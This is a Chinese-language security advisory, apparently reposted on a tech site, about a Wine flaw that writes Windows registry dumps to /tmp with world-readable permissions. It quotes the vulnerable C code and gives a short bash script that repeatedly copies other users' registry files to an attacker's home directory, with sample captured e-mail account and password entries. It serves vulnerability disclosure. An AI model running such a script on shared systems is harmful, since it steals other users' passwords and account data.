受影响系统:
Wine Windows API Emulator 20050310
Wine Windows API Emulator 20050305
Wine Windows API Emulator 20050211
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 12791
Wine是一款允许在UNIX操作系统(如Linux上)运行DOS和MS Windows程序(Windows 3.x 和Win32可执行程序)的免费软件
wine在启动win32应用程序时,会在/tmp中以regxxxxyyyy.tmp文件名临时存储windows注册表。这里xxxxxx是当前wine进程的十六进制pid值,yyyy是通常等于0的整数值。
regxxxxyyyy.tmp是以0644(-rw-r--r--)权限创建的,这在多用户环境中就导致了安全漏洞。实际上本地用户可以访问windows注册表的DUMP,获取敏感信息,如口令和其他保密数据。
受影响的函数是$winerelease/misc/registry.c中的_get_tmp_fn(FILE **)和$winerelease/server/registry.c中的save_branch( struct key *key, const char *path )。
_get_tmp_fn(FILE **) @ $winerelease/misc/registry.c :
-----------------------------------------------------
static LPSTR _get_tmp_fn(FILE **f)
{
LPSTR ret;
int tmp_fd,count;
ret = _xmalloc(50);
for (count = 0;;) {
sprintf(ret,"/tmp/reg%lx%04x.tmp",(long)getpid(),count++);
//here file regxxxyyyy.tmp is not created with secure permssions
if ((tmp_fd = open(ret,O_CREAT | O_EXCL | O_WRONLY,0666)) != -1) break;
if (errno != EEXIST) {
ERR("Unexpected error while open() call: %s\n",strerror(errno));
free(ret);
*f = NULL;
return NULL;
}
}
------------------------------------------------------
save_branch( struct key *,const char * ) @ $winerelease/server/registry.c:
------------------------------------------------------
static int save_branch( struct key *key, const char *path )
{
struct stat st;
char *p, *real, *tmp = NULL;
int fd, count = 0, ret = 0, by_symlink;
FILE *f;
.
.
.
for (;;)
{
sprintf( p, "reg%lx%04x.tmp", (long) getpid(), count++ );
//here file regxxxyyyy.tmp is not created with secure permssions
if ((fd = open( tmp, O_CREAT | O_EXCL | O_WRONLY, 0666 )) != -1) break;
if (errno != EEXIST) goto done;
close( fd );
}
.
.
.
}
------------------------------------------------------
open()在创建regxxxyyyy.tmp时,会使用0666模式做为参数。由于默认的umask是022 ==> (0666) &~ (022) = 0644 = -rw-r--r-- ,因此会以0644权限创建文件。
<*来源:Giovanni Delvecchio (badpenguin79@hotmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111082537009842&w=2
http://bugs.winehq.org/show_bug.cgi?id=2715
http://www.zone-h.org/advisories/read/id=7300
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
如果要利用这个漏洞,本地攻击者可以使用bash脚本检查/tmp中是否存在regxxxyyyy.tmp,如果存在就将其拷贝回本地目录进行分析。
bash脚本范例:
----------------------------------------------
#!/bin/sh
count=1
while [ true ]; do
if [ -f /tmp/reg*.tmp ]; then
cp /tmp/reg* /home/attacker/reg$count
count=$(($count + 1))
sleep 1
fi
done
---------------------------------------------
经测试这个脚本可获取敏感信息,如:
______________________________________________________________________________
[Software\\Microsoft\\Protected Storage System Provider\\*Default*\\Data\\b9819c52-1e12-4bbd-91e7-af9afea5b02d
\\87f5aab7-ca62-41c5-8896-27714d7b7e73\\MARSUSERPROTECTEDINFO]
"Behavior"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx
"Item Data"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx
________________________________________________________________________________
--------------------------------------------------------------------------------------------------------------------------------------
[Software\\Microsoft\\Protected Storage System Provider\\*Default*\\Data\\220d5cc1-853a-11d0-84bc-00c04fd43f8f
\\417e2d75-84bd-11d0-84bb-00c04fd43f8f\\HotmailCC990760]
"Behavior"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx
"Item Data"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx
--------------------------------------------------------------------------------------------------------------------------------------
以及:
---------------------------------------------------------------------------------------------------------------------------------------
[Software\\Microsoft\\Internet Account Manager\\Accounts\\00000008]
"Account Name"="libero.it"
"Connection Type"=dword:00000003
"POP3 Server"="pop3.libero.it"
"POP3 User Name"="xxxxxxx"
"POP3 Password2"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx
"POP3 Prompt for Password"=dword:00000000
"SMTP Server"="mail.libero.it"
"SMTP Display Name"="xxxxxx"
"SMTP Email Address"="xxxxxx@libero.it"
"POP3 Skip Account"=dword:00000000
"POP3 Port"=dword:0000006e
"SMTP User Name"=""
"SMTP Password2"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx
"SMTP Use Sicily"=dword:00000000
"SMTP Prompt for Password"=dword:00000000
--------------------------------------------------------------------------------------------------------------------------------------
这里有MSN Explorer和outlook的加密口令。
请注意,如果口令已加密的话,攻击者可将其导入到windows注册表系统中,这样就可以非法访问受害用户帐号,或使用网上的工具破解加密的口令。本文章共2页,当前在第1页 1 2
 |
频道声明:本频道的文章除部分特别声明禁止转载的专稿外,可以自由转载.但请务必注明出出处和原始作者 文章版权归本频道与文章作者所有.对于被频道转载文章的个人和网站,我们表示深深的谢意。
| 原始作者:佚名 |
录入时间:2007-1-2 22:29:43 |
| 信息来源:不详 |
投稿信箱:itqoo@126.com |
|
|
 |
|
用户登录 
新用户注册 
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) 